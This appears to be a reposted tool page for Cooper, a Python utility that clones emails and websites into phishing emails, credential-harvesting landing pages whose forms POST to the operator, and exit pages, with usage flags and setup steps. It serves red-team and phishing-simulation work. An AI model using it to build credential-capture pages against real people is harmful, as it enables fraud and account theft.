Cooper - A Python tool for ingesting HTML and producing HTML source suitable for phishing campaigns.

Cooper – A Python tool for ingesting HTML and producing HTML source suitable for phishing campaigns.

Latest Change Big dump of changes:
* Fixing some typos.
* Removing terminal colors until they can be done correctly (not hard coded) — they were ugly on Windows.
* Added a new option — collect just the page source without processing with -c.
* Phishgates now have their forms modified to direct POST to you and insert custom JavaScript for the form.

The main script. It may eventually offer a menu with more verbose information, so as to work better as a standalone tool. For now, Cooper has several options for specifying what you need it to do.

Use just one…
-e for Email – Use Cooper’s phishemail.py module. Specify a FILE.
-p for Phishgate – Use Cooper’s phishgate.py module. Specify a URL.
-x for eXit – Use Cooper’s phishexit.py module. Specify a URL.
-n for eNcode – Use Cooper to encode an image file as a Base64 string. Useful for embedding different images into a template or customizing a cloned email/website.

Cooper : A Python tool for ingesting HTML and producing HTML source suitable for phishing campaigns. Support Platform : All Windows and Unix Platform Support

Cooper : A Python tool for ingesting HTML and producing HTML source suitable for phishing campaigns.
Support Platform : All Windows and Unix Platform Support

You can also use…
-d for Decode – Indicate an email needs to be decoded and specify the encoding (base64 or quoted-printable).
-u for URL – Specify a URL you want Cooper to use when you need it to fix links for images, CSS, and/or scripts.
-s for Server – Add this when you want Cooper to start the HTTP server. Specify a PORT #.
-h for Help – View this help information.

Modules:
+ toolbox.py – The toolbox handles the common tasks, such as retrieving HTML source from files and webpages and starting the HTTP server.
+ phishemail.py – This module handles generating phishing emails. Use -e and feed it a file. Use -d to indicate if decoding is necessary. Use -u to provide a URL for img tags, scripts, and CSS.
+ phishgate.py – This module creates an index.html file suitable as a phishgate (a landing page for the phishing emails). Use -p and feed Cooper a URL or file (coming soon) to have Cooper output an index.html file so the webpage can be easily viewed in your browser via the HTTP server (if you start it).
+ phishexit.py – This module creates an exit page for your phishing campaign. This might be a cloned copy of the phishgate website’s 404 page. Use -x and feed it a URL or file (coming soon).

Usage examples:
Creating an email:
– Get the source of an email to clone and save it to a file.
– Remove the additional text (e.g. delivery info, etc.)
– To process an email encoded in base64 with images hosted on www.foo.bar: cooper.py -e email.html -d base64 -u http://www.foo.bar

Creating a phishgate:
– Find a webpage to clone.
– To clone a webpage and view it in your browser: cooper.py -p http://www.foo.bar -s 8888

Creating an exit page:
– Find a URL that pulls up the 404 page of your cloned website.
– To clone the 404 page: cooper.py -x http://www.foo.bar/garbage.php -u http://www.foo.bar

Misc Info:
– URLs are replaced with text that will do nothing for you. This is text that was needed for the particular phishing tool Cooper was created to work with. Modify the replaceURL() functions as needed.
– Images are scraped and then encoded in Base64 before being embedded in the template. This is to make it so the templates are not reliant on the website being available/keeping the images where they are. If you do not want this, then remove the encoding lines from the fixImageURL() functions.
– The HTTP server option is there to enable you to easily review Cooper’s output by hitting 127.0.0.1:PORT. You could just open the index.html, but why would that be cooler than this?

Setup:
– git clone https://github.com/chrismaddalena/Cooper
– cd Cooper
Find the setup files inside the setup directory. Cooper requires several libs for scraping websites and parsing the HTML. Use pip and the requirements.txt to install dependencies.
pip install -r requirements.txt
Then you can check the dependencies by running setup_check.py. or download old source

Download : v1.1.0.zip  |v1.1.0.tar.gz
Source : https://github.com/chrismaddalena